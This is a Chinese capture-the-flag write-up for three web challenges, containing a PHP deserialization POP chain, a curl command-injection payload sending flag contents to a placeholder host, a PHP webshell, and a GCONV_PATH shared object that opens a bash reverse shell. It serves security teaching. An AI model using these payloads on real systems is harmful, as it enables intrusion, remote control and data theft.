2022DASCTF X SU 三月春季挑战赛web题解


2022DASCTF X SU 三月春季挑战赛web题解

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

pop链为

fin->__destruct()->what->__toString()->mix->run()->crow->__invoke()->fin->__call()->mix->get_flag()

$a=new fin();
$a->f1=new what();
$a->f1->a=new mix();
$a->f1->a->m1=new crow();
$a->f1->a->m1->v1=new fin();
$a->f1->a->m1->v1->f1=new mix();
$a->f1->a->m1->v1->f1->m1="?><?php system('cat *');?>";

var_dump(urlencode(serialize($a)));

F12查看flag即可

calc

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"




if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)  
        
        
 

查看代码发现log和eval中都有num传入的参数,blacklist中禁用了括号,所以估计调用不了函数,执行system。空格可以用%09绕过,用#绕过eval();用反引号执行系统命令,最后使用curl带出来就好了

payload1%23%60curl%09youripaddress%3Aport%3Fa%3D%5C%60cat%09Th1s%2A%5C%60%60

upgdstore

先测试一下,只能传入后缀名自为php的文件,过滤了eval,include,show_source等,可以使用大写绕过。

先传一个php查看一下index.php的源码

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

然后仿造这个界面写一个php文件,base64编码一下

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
//设置上传目录
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);

$content = file_get_contents($temp_file);

$new_file_name = $file_name;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

PGRpdiBjbGFzcz0ibGlnaHQiPjxzcGFuIGNsYXNzPSJnbG93Ij4KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJwb3N0IiBvbnN1Ym1pdD0icmV0dXJuIGNoZWNrRmlsZSgpIj4KICAgIOWYv+S8meiuoe+8jOS8oOS4queBq++8n++8gQogICAgPGlucHV0IGNsYXNzPSJpbnB1dF9maWxlIiB0eXBlPSJmaWxlIiBuYW1lPSJ1cGxvYWRfZmlsZSIvPgogICAgPGlucHV0IGNsYXNzPSJidXR0b24iIHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+CjwvZm9ybT4KPC9zcGFuPjxzcGFuIGNsYXNzPSJmbGFyZSI+PC9zcGFuPjxkaXY+Cjw/cGhwCi8v6K6+572u5LiK5Lyg55uu5b2VCmRlZmluZSgiVVBMT0FEX1BBVEgiLCAiL3RtcCIpOwokbXNnID0gIlVwbG9hZCBTdWNjZXNzISI7CmlmIChpc3NldCgkX1BPU1RbJ3N1Ym1pdCddKSkgewokdGVtcF9maWxlID0gJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsndG1wX25hbWUnXTsKJGZpbGVfbmFtZSA9ICRfRklMRVNbJ3VwbG9hZF9maWxlJ11bJ25hbWUnXTsKJGV4dCA9IHBhdGhpbmZvKCRmaWxlX25hbWUsUEFUSElORk9fRVhURU5TSU9OKTsKCiRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRlbXBfZmlsZSk7CgokbmV3X2ZpbGVfbmFtZSA9ICRmaWxlX25hbWU7CiAgICAgICAgJGltZ19wYXRoID0gVVBMT0FEX1BBVEggLiAnLycgLiAkbmV3X2ZpbGVfbmFtZTsKCgogICAgICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJHRlbXBfZmlsZSwgJGltZ19wYXRoKSl7CiAgICAgICAgICAgICRpc191cGxvYWQgPSB0cnVlOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtc2cgPSAnVXBsb2FkIEZhaWxlZCEnOwogICAgICAgICAgICBkaWUoKTsKICAgICAgICB9CiAgICAgICAgZWNobyAnPGRpdiBzdHlsZT0iY29sb3I6I0YwMCI+Jy4kbXNnLiIgTG9vayBoZXJlfiAiLiRpbWdfcGF0aC4iPC9kaXY+IjsKfQ==

再传一个文件包含一下

payload<?php Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT05MmJmY2I1Njc0MmNlMTk0NzYxNzkzMjUzMTViMDBlYi5waHA="));?>

之后利用 使用GCONV_PATH与iconv进行bypass disable_functions_lesion__的博客-CSDN博客

上传exp.c和gconv-modules

exp.c

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}

gcc exp.c -o exp.so -shared -fPIC

gconv-modules

通用模板

module  自定义字符集名字(大写)//    INTERNAL    ../../../../../../../../tmp/自定义字符集名字(小写)    2
module  INTERNAL    自定义字符集名字(大写)//    ../../../../../../../../tmp/自定义字符集名字(小写)    2

题目

module  EXP//    INTERNAL    ../../../../../../../../tmp/exp    2 
module  INTERNAL   EXP//    ../../../../../../../../tmp/exp    2

然后再传一个一句话木马

<?php Eval(base64_decode("ZXZhbCgkX1BPU1RbJ2EnXSk7").";");?>

最后触发我们之前上传的马。payloada=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.exp.utf-8/resource=/tmp/exp.so');

使用vps监听一下,反弹shell。

查找权限

find / -user root -perm -4000 -print 2>/dev/null

/bin/mount
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/nl
/usr/bin/passwd

发现nl有权限,直接nl /flag


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录